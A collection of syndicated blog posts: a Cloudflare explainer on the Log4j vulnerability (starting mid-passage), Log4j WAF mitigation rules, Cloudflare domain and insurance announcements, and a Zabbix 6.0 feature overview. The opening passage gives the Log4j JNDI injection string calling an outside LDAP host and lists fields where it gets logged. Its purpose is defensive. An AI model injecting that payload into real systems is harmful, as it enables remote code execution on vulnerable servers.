So all an attacker has to do is find some input that gets logged and add something like  ${jndi:ldap://example.com/a}. This could be a common HTTP header like User-Agent (that commonly gets logged) or perhaps a form parameter like username that might also be logged.

This is likely very common in Java-based Internet facing software that uses log4j. More insidious is that non-Internet facing software that uses Java can also be exploitable as data gets passed from system to system. For example, a User-Agent string containing the exploit could be passed to a backend system written in Java that does indexing or data science and the exploit could get logged. This is why it is vital that all Java-based software that uses log4j version 2 is patched or has mitigations applied immediately. Even if the Internet-facing software is not written in Java it is possible that strings get passed to other systems that are in Java allowing the exploit to happen.

And Java is used for many more systems than just those that are Internet facing. For example, it’s not hard to imagine a package handling system that scans QR codes on boxes, or a contactless door key both being vulnerable if they are written in Java and use log4j. In one case a carefully crafted QR code might contain a postal address containing the exploit string; in the other a carefully programmed door key could contain the exploit and be logged by a system that keeps track of entries and exits.

And systems that do periodic work might pick up the exploit and log it later. So the exploit could lay dormant until some indexing, rollup, or archive process written in Java inadvertently logs the bad string. Hours or even days later.

Cloudflare Firewall Protection

Cloudflare rolled out protection for our customers using our Firewall in the form of rules that block the jndi Lookup in common locations in an HTTP request. This is detailed here. We have continued to refine these rules as attackers have modified their exploits and will continue to do so.

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Post Syndicated from Eric Brown original https://blog.cloudflare.com/introducing-domain-protection/

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Everything on the web starts with a domain name. It is the foundation on which a company’s online presence is built. If that foundation is compromised, the damage can be immense.

As part of CIO Week, we looked at all the biggest risks that companies continue to face online, and how we could address them. The compromise of a domain name remains one of the greatest. There are many ways in which a domain may be hijacked or otherwise compromised, all the way up to the most serious: losing control of your domain name altogether.

You don’t want it to happen to you. Imagine not just losing your website, but all your company’s email, a myriad of systems tied to your corporate domain, and who knows what else. Having an attacker compromise your corporate domain is the stuff of nightmares for every CIO. And, if you’re a CIO and it’s not something you’re worrying about, know that we literally surveyed every other domain registrar and were so unsatisfied with their security practices we needed to launch our own.

But, now that we have, we want to make domain compromise something that should never, ever happen again. For that reason, we’re excited to announce that we are extending a new level of domain record protection to all our Enterprise customers. We call it Cloudflare Domain Protection, and we’re including it for free for every Cloudflare Enterprise customer. For those customers who have domains secured by Domain Protection, we will also waive all registration and renewal fees on those domains. Cloudflare Domain Protection will be available in Q1 — you can speak to your account manager now to take advantage of the offer.

It’s not possible to build a truly secure domain registrar solution without an understanding of how a domain gets compromised. Before we get into more details of our offering, we wanted to take you on a tour of how a domain can get compromised.

Stealing the Keys to Your Kingdom

There are three types of domain compromises that we often hear about. Let’s take a look at each of them.

Domain Transfers

One of the most serious compromises is an unauthorized transfer of the domain to another registrar. While cooperation amongst registrars has improved greatly over the years, it can still be very difficult to recover a stolen domain. It can often take weeks — or even months. It may require legal action. In a best case scenario, the domain may be recovered in a few days; in the worst case, you may never get it back.

The ability to easily transfer a domain between registrars is vitally important, and is part of what keeps the market for domain registration competitive. However, it also introduces potential risk. The transfer process used by most registries involves using a token to authorize the transfer. Prior to the widespread practice of redacting publicly accessible whois data, an email approval process was also used. To steal a domain, a malicious actor only needs to gain access to the authorization code and be able to remove any domain locks.

Unauthorized transfers start often with a compromised account. In many cases, the customer may have their account credentials compromised. In other cases, attackers use elaborate social engineering schemes to take control of the domain, often moving the domain between registrar accounts before transferring the domain to another registrar.

Name Server Updates

Name server updates are another way in which domains may be compromised. Whereas a domain transfer is typically an attempt to permanently take over a domain, a name server update is more temporary in nature. However, even if the update can usually be quickly reversed, these types of domain hijacks can be very damaging. They open the possibility of stolen customer data and intercepted email traffic. But most of all: they open an organization up to very serious reputational damage.

Domain Suspensions and Deletions

Most domain suspensions and deletions are not the result of malicious activity, but rather, they often happen through human error or system failures. In many cases, the customer forgets to renew a domain or neglects to update their payment method. In other cases, the registrar mistakenly suspends or deletes a domain.

Regardless of the reason though: the result is a domain that no longer resolves.

While these are certainly not the only ways in which domains may be compromised, they are some of the most damaging. We have spent a lot of time focused on these types of compromises and how to prevent them from happening.

A Different Approach to Domains

Like a lot of folks, we’ve long been frustrated by the state of the domain business. And so this isn’t our first rodeo here.

We already have a registrar service — Cloudflare Registrar — which is open to any Cloudflare customer. We make it super easy to get started, to integrate with Cloudflare, and there’s no markup on our pricing — we promise to never charge you anything more than the wholesale price each TLD charges. The aim: no more “bait and switch” and “endless upsell” (which, according to our customers, are the two most common terms associated with the domain industry). Instead, it’s a registrar that you love. Obviously, it’s Cloudflare, so we incorporated a number of security best practices into how it operates, too.

For our most demanding enterprise customers, we also have Custom Domain Protection. Every client using Custom Domain Protection defines their own process for updating records. As we said when we introduced it: “if a Custom Domain Protection client wants us to not change their domain records unless six different individuals call us, in order, from a set of predefined phone numbers, each reading multiple unique pass codes, and telling us their favorite ice cream flavor, on a Tuesday that is also a full moon, we will enforce that. Literally.

Yes, it’s secure, but it’s also not the most scalable solution. As a result, we charge a premium for it. As we spoke to our Enterprise customers, however, there was a need for something in between — a Goldilocks solution, so to speak, that offers a high level of protection without being quite so custom.

Enter Cloudflare Domain Protection.

A Triple-Locked Approach

Our approach to securing domains with Domain Protection is quite straightforward: identify the various attack vectors, and design a layered security mode to address each potential threat.

Before we take a look at each security layer, it’s important to understand the relationship between registrars and registries, and how that impacts domain security. You can think of registries as the wholesaler of domain names. They manage the central database of all registered domains within the Top-Level-Domain (TLD). They are also responsible for determining the wholesale pricing and establishing TLD specific policies.

Registrars, on the other hand, are the retailer of domains and are responsible for selling the domains to the end user. With each registration, transfer, or renewal, the registrar pays the registry a transaction fee.

Registrars and registries jointly manage domain registrations in what’s called the Shared Registration System (SRS). Registrars communicate with registries using an IETF standard called the Extensible Provisioning Protocol (EPP). Embodied in the EPP standard are a set of domain status that can be applied by registrars and registries to lock the domain and prevent updates, deletions, and transfers (to another registrar).

Registrars are able to apply “client” locks, frequently referred to as Registrar Locks. Registries apply “server” locks, also known as Registry Locks. It’s important to note that the registry locks always supersede the registrar locks. This means that the registrar locks cannot be removed until the registry locks have been removed.

Now, let’s take a closer look at our planned approach.

We start by applying the EPP Registrar Locks to the domain name. These are the EPP client locks that prevent domain updates, transfers, and deletions.

We then apply an internal lock that prevents any API calls to that domain from being processed. This lock functions outside of EPP and is designed to protect the domain should the EPP locks be removed, as well as situations where an operation may be executed outside of EPP. For example, in some TLDs the domain contact data is only stored at the registrar and never transmitted to the registry. In these cases, it’s important to have a non EPP locking mechanism.

After the registrar locks are applied, we will request the registry to apply the Registry Locks using a special non-EPP based procedure. It’s important to note that not all registries offer Registry Lock as a service. In some instances, we may not be able to apply this last locking feature.

Lastly, a secure verification procedure is created to handle any future requests to unlock or modify the domain.

Included Out of the Box

Our aim is to make Cloudflare Domain Protection the most scalable secure solution for domains that’s available. We want to ensure that the domains that matter most to our customers — the mission critical, high value domains — are securely protected.

Eligible domains that are explicitly included under a Cloudflare Enterprise contract may be included in our Domain Protection registration service at no additional cost. And, as we mentioned earlier, this will also cover registration and renewal fees — so not only will securing your domain be one less thing for you to worry about, so too will be paying for it.

Interested in applying Cloudflare Domain Protection to your domain names? Reach out to your account manager and let them know you’re interested. Additional details will be coming in early Q1, 2022.

CVE-2021-44228 – Log4j RCE 0-day mitigation

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

CVE-2021-44228 - Log4j RCE 0-day mitigation

CVE-2021-44228 - Log4j RCE 0-day mitigation

A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote code execution (RCE).

This vulnerability is actively being exploited and anyone using Log4j should update to version 2.15.0 as soon as possible. The latest version can already be found on the Log4j download page.

If updating to the latest version is not possible, customers can also mitigate exploit attempts by setting the system property “log4j2.formatMsgNoLookups” to “true”; or by removing the JndiLookup class from the classpath. Java release 8u121 also protects against this remote code execution vector.

Customers using the Cloudflare WAF can also leverage three newly deployed rules to help mitigate any exploit attempts:

Rule ID Description Default Action
100514 (legacy WAF)
6b1cc72dff9746469d4695a474430f12 (new WAF)
Log4j Headers BLOCK
100515 (legacy WAF)
0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF)
Log4j Body LOG
100516 (legacy WAF)
5f6744fa026a4638bda5b3d7d5e015dd (new WAF)
Log4j URL LOG

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

Due to the risk of false positives, customers should immediately review Firewall Event logs and switch the Log4j Body and URL rules to BLOCK if none are found. The rule inspecting HTTP headers has been directly deployed with a default action of BLOCK to all WAF customers.

We are continuing to monitor the situation and will update any WAF managed rules accordingly.

More details on the vulnerability can be found on the official Log4j security page.

Who is affected

Log4j is a powerful Java based logging library maintained by the Apache Software Foundation.

In all Log4j versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

What’s new in Zabbix 6.0 LTS by Artūrs Lontons / Zabbix Summit Online 2021

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/whats-new-in-zabbix-6-0-lts-by-arturs-lontons-zabbix-summit-online-2021/17761/

Zabbix 6.0 LTS comes packed with many new enterprise-level features and improvements. Join Artūrs Lontons and take a look at some of the major features that will be available with the release of Zabbix 6.0 LTS.

The full recording of the speech is available on the official Zabbix Youtube channel.

If we look at the Zabbix roadmap and Zabbix 6.0 LTS release in particular, we can see that one of the main focuses of Zabbix development is releasing features that solve many complex enterprise-grade problems and use cases. Zabbix 6.0 LTS aims to:

  • Solve enterprise-level security and redundancy requirements
  • Improve performance for large Zabbix instances
  • Provide additional value to different types of Zabbix users – DevOPS and ITOps teams, Business process owner, Managers
  • Continue to extend Zabbix monitoring and data collection capabilities
  • Provide continued delivery of official integrations with 3rd party systems

Let’s take a look at the specific Zabbix 6.0 LTS features that can guide us towards achieving these goals.

Zabbix server High Availability cluster

With the release of Zabbix 6.0 LTS, Zabbix administrators will now have the ability to deploy Zabbix server HA cluster out-of-the-box. No additional tools are required to achieve this.

Zabbix server HA cluster supports an unlimited number of Zabbix server nodes. All nodes will use the same database backend – this is where the status of all nodes will be stored in the ha_node table. Nodes will report their status every 5 seconds by updating the corresponding record in the ha_node table.

To enable High availability, you will first have to define a new parameter in the Zabbix server configuration file: HANodeName

  • Empty by default
  • This parameter should contain an arbitrary name of the HA node
  • Providing value to this parameter will enable Zabbix server cluster mode

Standby nodes monitor the last access time of the active node from the ha_node table.

  • If the difference between last access time and current time reaches the failover delay, the cluster fails over to the standby node
  • Failover operation is logged in the Zabbix server log

It is possible to define a custom failover delay – a time window after which an unreachable active node is considered lost and failover to one of the standby nodes takes place.

As for the Zabbix proxies, the Server parameter in the Zabbix proxy configuration file now supports multiple addresses separated by a semicolon. The proxy will attempt to connect to each of the nodes until it succeeds.

Other HA cluster related features:

  • New command-line options to check HA cluster status
  • hanode.get API method to obtain the list of HA nodes
  • The new internal check provides LLD information to discover Zabbix server HA nodes
  • HA Failover event logged in the Zabbix Audit log
  • Zabbix Frontend will automatically switch to the active Zabbix server node

You can find a more detailed look at the Zabbix Server HA cluster feature in the Zabbix Summit Online 2021 speech dedicated to the topic.

Business service monitoring

The Services section has received a complete redesign in Zabbix 6.0 LTS. Business Service Monitoring (BSM) enables Zabbix administrators to define services of varying complexity and monitor their status.

BSM provides added value in a multitude of use cases, where we wish to define and monitor services based on:

  • Server clusters
  • Services that utilize load balancing
  • Services that consist of a complex IT stack
  • Systems with redundant components in place
  • And more

Business Service monitoring has been designed with scalability in mind. Zabbix is capable of monitoring over 100k services on a single Zabbix instance.

For our Business Service example, we used a website, which depends on multiple components such as the network connection, DB backend, Application server, and more. We can see that the service status calculation is done by utilizing tags and deciding if the existing problems will affect the service based on the problem tags.

In Zabbix 6.0 LTS there are many ways how service status calculations can be performed. In case of a problem, the service state can be changed to:

  • The most critical problem severity, based on the child service problem severities
  • The most critical problem severity, based on the child service problem severities, only if all child services are in a problem state
  • The service is set to constantly be in an OK state

Changing the service status to a specific problem severity if:

  • At least N or N% of child services have a specific status
  • Define service weights and calculate the service status based on the service weights

There are many other additional features, all of which are covered in our Zabbix Summit Online 2021 speech dedicated to Business Service monitoring:

  • Ability to define permissions on specific services
  • SLA monitoring
  • Business Service root cause analysis
  • Receive alerts and react on Business Service status change
  • Define Business Service permissions for multi-tenant environments

New Audit log schema

The existing audit log has been redesigned from scratch and now supports detailed logging for both Zabbix server and Zabbix frontend operations:

  • Zabbix 6.0 LTS introduces a new database structure for the Audit log
  • Collision resistant IDs (CUID) will be used for ID generation to prevent audit log row locks
  • Audit log records will be added in bulk SQL requests
  • Introducing Recordset ID column. This will help users recognize which changes have been made in a particular operation

The goal of the Zabbix 6.0 LTS audit log redesign is to provide reliable and detailed audit logging while minimizing the potential performance impact on large Zabbix instances:

  • Detailed logging of both Zabbix frontend and Zabbix server records
  • Designed with minimal performance impact in mind
  • Accessible via Zabbix API

Implementing the new audit log schema is an ongoing effort – further improvements will be done throughout the Zabbix update life cycle.

Machine learning

New trend functions have been added which utilize machine learning to perform anomaly detection and baseline monitoring:

  • New trend function – trendstl, allows you to detect anomalous metric behavior
  • New trend function – baselinewma, returns baseline by averaging data periods in seasons
  • New trend function – baselinedev, returns the number of standard deviations

An in-depth look into Machine learning in Zabbix 6.0 LTS is covered in our Zabbix Summit Online 2021 speech dedicated to machine learning, anomaly detection, and baseline monitoring.

New ways to visualize your data

Collecting and processing metrics is just a part of the monitoring equation. Visualization and the ability to display our infrastructure status in a single pane of glass are also vital to large environments. Zabbix 6.0 LTS adds multiple new visualization options while also improving the existing features.

  • The data table widget allows you to create a summary view for the related metric status on your hosts
  • The Top N and Bottom N functions of the data table widget allow you to have an overview of your highest or lowest item values
  • The single item widget allows you to display values for a single metric
  • Improvements to the existing vector graphs such as the ability to reference individual items and more
  • The SLA report widget displays the current SLA for services filtered by service tags

We are proud to announce that Zabbix 6.0 LTS will provide a native Geomap widget. Now you can take a look at the current status of your IT infrastructure on a geographic map:

  • The host coordinates are provided in the host inventory fields
  • Users will be able to filter the map by host groups and tags
  • Depending on the map zoom level – the hosts will be grouped into a single object
  • Support of multiple Geomap providers, such as OpenStreetMap, OpenTopoMap, Stamen Terrain, USGS US Topo, and others

Zabbix agent – improvements and new items

Zabbix agent and Zabbix agent 2 have also received some improvements. From new items to improved usability – both Zabbix agents are now more flexible than ever. The improvements include such features as:

  • New items to obtain additional file information such as file owner and file permissions
  • New item which can collect agent host metadata as a metric
  • New item with which you can count matching TCP/UDP sockets
  • It is now possible to natively monitor your SSL/TLS certificates with a new Zabbix agent2 item. The item can be used to validate a TLS/SSL certificate and provide you additional certificate details
  • User parameters can now be reloaded without having to restart the Zabbix agent

In addition, a major improvement to introducing new Zabbix agent 2 plugins has been made. Zabbix agent 2 now supports loading stand-alone plugins without having to recompile the Zabbix agent 2.

Custom Zabbix password complexity requirements

One of the main improvements to Zabbix security is the ability to define flexible password complexity requirements. Zabbix Super admins can now define the following password complexity requirements:

  • Set the minimum password length
  • Define password character requirements
  • Mitigate the risk of a dictionary attack by prohibiting the usage of the most common password strings

UI/UX improvements

Improving and simplifying the existing workflows is always a priority for every major Zabbix release. In Zabbix 6.0 LTS we’ve added many seemingly simple improvements, that have major impacts related to the “feel” of the product and can make your day-to-day workflows even smoother:

  • It is now possible to create hosts directly from MonitoringHosts
  • Removed MonitoringOverview section. For improved user experience, the trigger and data overview functionality can now be accessed only via dashboard widgets.
  • The default type of information for items will now be selected automatically depending on the item key.
  • The simple macros in map labels and graph names have been replaced with expression macros to ensure consistency with the new trigger expression syntax

New templates and integrations

Adding new official templates and integrations is an ongoing process and Zabbix 6.0 LTS is no exception here’s a preview for some of the new templates and integrations that you can expect in Zabbix 6.0 LTS:

  • f5 BIG-IP
  • Cisco ASAv
  • HPE ProLiant servers
  • Cloudflare
  • InfluxDB
  • Travis CI
  • Dell PowerEdge

Zabbix 6.0 also brings a new GitHub webhook integration which allows you to generate GitHub issues based on Zabbix events!

Other changes and improvements

But that’s not all! There are more features and improvements that await you in Zabbix 6.0 LTS. From overall performance improvements on specific Zabbix components, to brand new history functions and command-line tool parameters:

  • Detect continuous increase or decrease of values with new monotonic history functions
  • Added utf8mb4 as a supported MySQL character set and collation
  • Added the support of additional HTTP methods for webhooks
  • Timeout settings for Zabbix command-line tools
  • Performance improvements for Zabbix Server, Frontend, and Proxy

Questions and answers

Q: How can you configure geographical maps? Are they similar to regular maps?

A: Geomaps can be used as a Dashboard widget. First, you have to select a Geomap provider in the Administration – General – Geographical maps section. You can either use the pre-defined Geomap providers or define a custom one. Then, you need to make sure that the Location latitude and Location longitude fields are configured in the Inventory section of the hosts which you wish to display on your map. Once that is done, simply deploy a new Geomap widget, filter the required hosts and you’re all set. Geomaps are currently available in the latest alpha release, so you can get some hands-on experience right now.

Q: Any specific performance improvements that we can discuss at this point for Zabbix 6.0 LTS?

A: There have been quite a few. From the frontend side – we have improved the underlying queries that are related to linking new templates, therefore the template linkage performance has increased. This will be very noticeable in large instances, especially when linking or unlinking many templates in a single go.
There have also been improvements to Server – Proxy communication. Specifically – the logic of how proxy frees up uncompressed data. We’ve also introduced improvements on the DB backend side of things – from general improvements to existing queries/logic, to the introduction of primary keys for history tables, which we are still extensively testing at this point.

Q: Will you still be able to change the type of information manually, in case you have some advanced preprocessing rules?

A: In Zabbix 6.0 LTS Zabbix will try and automatically pick the corresponding type of information for your item. This is a great UX improvement since you don’t have to refer to the documentation every time you are defining a new item. And, yes, you will still be able to change the type of information manually – either because of preprocessing rules or if you’re simply doing some troubleshooting.

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Post Syndicated from Deeksha Lamba original https://blog.cloudflare.com/cyber-risk-partnerships/

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Cloudflare announces partnerships with leading cyber insurers and incident response providers

We are excited to announce our cyber risk partnership program with leading cyber insurance carriers and incident response providers to help our customers reduce their cyber risk. Cloudflare customers can qualify for discounts on premiums or enhanced coverage with our partners. Additionally, our incident response partners are partnering with us for mitigating under attack scenarios in an accelerated manner.  

What is a business’ cyber risk?

Let’s start with security and insurance —  e.g., being a homeowner is an adventure and a responsibility. You personalize your home, maintain it, and make it secure against the slightest possibility of intrusion — fence it up, lock the doors, install a state of the art security system, and so on. These measures definitely reduce the probability of an intrusion, but you still buy insurance. Why? To cover for the rare possibility that something might go wrong — human errors, like leaving the garage door open, or unlikely events, like a fire, hurricane etc. And when something does go wrong, you call the experts (aka police) to investigate and respond to the situation.

Running a business that has any sort of online presence is evolving along the same lines. Getting the right security posture in place is absolutely necessary to protect your business, customers, and employees from nefarious cyber attacks. But as a responsible business owner/CFO/CISO, nevertheless you buy cyber insurance to protect your business from long-tail events that could allow malicious attackers into your environment, causing material damage to your business. And if such an event does take place, you engage with incident response companies for active investigation and mitigation.

In short, you do everything in your control to reduce your business’ cyber risk by having the right security, insurance, and active response measures in place.

The cyber insurance industry and the rise of ransomware attacks

Over the last two years, the rise of ransomware attacks has wreaked havoc on businesses and the cyber insurance industry. As per a Treasury Department report, nearly 600 million dollars in banking transactions were linked to possible ransomware payments in Suspicious Activity Reports (SARs) filed by financial services firms to the U.S. Government for the first six months of 2021, a jump of more than 40% over the total for all of 2020. Additionally, the Treasury Department investigators identified about 5.2 billion dollars in bitcoin transactions as potential ransomware payments, indicating that the actual amount of ransomware payments was much higher1.

The rise of these attacks has and should make businesses more cautious, making them more inclined to have the right cybersecurity posture in place  and to buy cyber insurance coverage.

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Further, the rising frequency and severity of attacks, especially ransomware attacks, has led to increasing insurance claims and loss ratios (loss ratios refers to insurance claims i.e., how much insurance companies pay out in claims costs divided by total earned premiums i.e., how much customers pay them for insurance) for the cyber insurers. As per a recent research report, the most frequent types of losses covered by cyber insurers were ransomware (41%), funds transfer loss (27%), and business email compromise incidents (19%). These trends are pushing legacy insurance carriers to reevaluate how much coverage they can afford to offer and how much they have to charge clients to do so; thereby, triggering a structural change that can impact the ability of companies, especially the small and medium businesses, to minimize their cyber risk.

The end result has been a drastic increase in the premiums and denial rates over the last 12 months amongst some carriers, which has pushed customers to seek new coverage. The premiums have increased upwards of 50%, according to infosec experts and vendors, with some quotes jumping closer to 100%.2 Also, the lack of accessible cyber insurance and proper coverage disproportionately impacts the small and medium enterprises that find themselves as the common target for these cyber attacks. According to a recent research report, 70% of ransomware attacks are aimed at organizations with less than 1,000 employees.3 The increased automation of cyber attacks coupled with the use of insecure remote access tools during the pandemic has left these organizations exposed all while being faced with increased cyber insurance premiums or no access to coverage.

While some carriers are excluding ransomware payments from customers’ policies or are denying coverage to customers who don’t have the right security measures in place, there is a new breed of insurance carriers that are incentivizing customers in the form of broader coverage or lower prices for proactively implementing cybersecurity controls.

Cloudflare’s cyber risk partnerships

At Cloudflare, we have always believed in making the Internet a better place. We have been helping our customers focus on their core business while we take care of their cyber security. We are now going a step further, helping our customers reduce their cyber risk by partnering with leading cyber insurance underwriters and incident response providers.

Our objective is to help our customers reduce their cyber risk. We are doing so in partnership with several leading companies highlighted below. Our customers can qualify for enhanced coverage and discounted premiums for their cyber insurance policies by leveraging their security posture with Cloudflare.

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Insurance companies: Powered by Cloudflare’s security suite, our customers have comprehensive protection against the most common and severe threat vectors. In most of the cases, when attackers see that a business is using Cloudflare they realize they will not be able to execute a denial of service (DoS) attack or infiltrate the customer’s network. Knowing the power of Cloudflare, the attackers prefer to spend their time on more vulnerable targets. This implies that our customers face a lower frequency and severity of attacks — an ideal customer set that could imply a lower loss ratio for underwriters. Our partners understand the security benefits of using Cloudflare’s security suite and are letting our customers qualify for lower premium rates and enhanced coverage.

Cloudflare customers can qualify for discounts/credits on premiums and enhanced coverage with our partners At-Bay, Coalition, and Cowbell Cyber.

“An insurance policy is an effective tool to articulate the impact of security choices on the financial risk of a company. By offering better pricing to companies who implement stronger controls, like Cloudflare’s Comprehensive DDoS Protection, we help customers understand how best to reduce risk. Incentivizing our customers to adopt innovative security solutions like Cloudflare, combined with At-Bay’s free active risk monitoring, has helped reduce ransomware in At-Bay’s portfolio 7x below the market average.”
Rotem Iram,
Co-founder and CEO, At-Bay

“It’s incredible what Cloudflare has done to create a safer Internet. When Cloudflare’s technology is paired with insurance, we are able to protect businesses in an entirely new way. We are excited to offer Cloudflare customers enhanced cyber insurance coverage alongside Coalition’s active security monitoring platform to help businesses build true cyber resilience with an always-on insurance policy.”
Joshua Motta, Co-founder & CEO, Coalition

“We are excited to work with Cloudflare to address our customers’ cybersecurity needs and help reduce their cyber risk. Collaborating with cybersecurity companies like Cloudflare will definitely enable a more data-driven underwriting approach that the industry needs”
Nate Walsh, Head of Strategic Partnerships, Corvus Insurance

“The complexity and frequency of cyber attacks continue to rise, and small and medium enterprises are increasingly becoming the center of these attacks. Through partners like Cloudflare, we want to encourage these businesses to adopt the best security standards and proactively address vulnerabilities, so they can benefit from savings on their cyber insurance policy premiums.”
Jack Kudale, Founder and CEO, Cowbell Cyber

Incident Response companies: Our incident response partners deal with active under attack situations day in, day out — helping customers mitigate the attack, and getting their web property and network back online. Many times, precious time is wasted in trying to figure out which security vendor to reach out to and how to get hold of the right team. We are announcing new relationships with prominent incident response providers CrowdStrike, Mandiant, and Secureworks to enable rapid referral of organizations under attack. As a refresher — my colleague, James Espinosa, wrote a great blog post on how Cloudflare helps customers against ransomware DDoS attacks.

“The speed in which a company is able to identify, investigate and remediate a threat heavily determines how it will fare in the end. Our partnership with Cloudflare provides companies the ability to take action rapidly and contain exposure at the time of an attack, enabling them to get back on their feet and return to business as usual as quickly as possible.”
Thomas Etheridge, Senior Vice President, CrowdStrike Services

“As cyber threats continue to rapidly evolve, the need for organizations to put response plans in place increases. Together, Mandiant and Cloudflare are enabling our mutual customers to mitigate the risk breaches pose to their business operations. We hope to see more of these much-needed technology collaborations that help organizations address the growing threat of ransomware and DDoS attacks in a timely manner.”
Marshall Heilman, EVP & Chief Technology Officer, Mandiant

“Secureworks’ proactive incident response and adversarial testing expertise combined with Cloudflare’s intelligent global platform enables our mutual customers to better mitigate the threats of sophisticated cyberattacks. This partnership is a much needed approach to addressing advanced cyber threats with speed and automation.”
Chris Bell, Vice President – Strategic Alliances, Secureworks

What’s next?

In summary, Cloudflare and its partners are coming together to ensure that our customers can run their business while getting adequate cybersecurity and risk coverage. However, we will not stop here. In the coming months, we’ll be working on creating programmatic ways to share threat intelligence with our cyber risk partners. Through our Security Center, we want to enable our customers, if they so choose, to safely share their security posture information with our partners for easier, transparent underwriting. Given the scale of our network and the magnitude and heterogeneity of attacks that we witness, we are in a strong position to provide our partners with insights around long-tail risks.

If you are interested in learning more, please refer to the partner links (At-Bay, Coalition, and Cowbell Cyber) or visit our cyber risk partnership page. If you’re interested in becoming a partner, please fill up this form.

….
Sources:
1https://www.wsj.com/articles/suspected-ransomware-payments-for-first-half-of-2021-total-590-million-11634308503
Gallagher, Cyber Insurance Market Update, Mid-year 2021
2https://www.ajg.com/us/news-and-insights/2021/aug/global-cyber-market-update/
3https://searchsecurity.techtarget.com/news/252507932/Cyber-insurance-premiums-costs-skyrocket-as-attacks-surge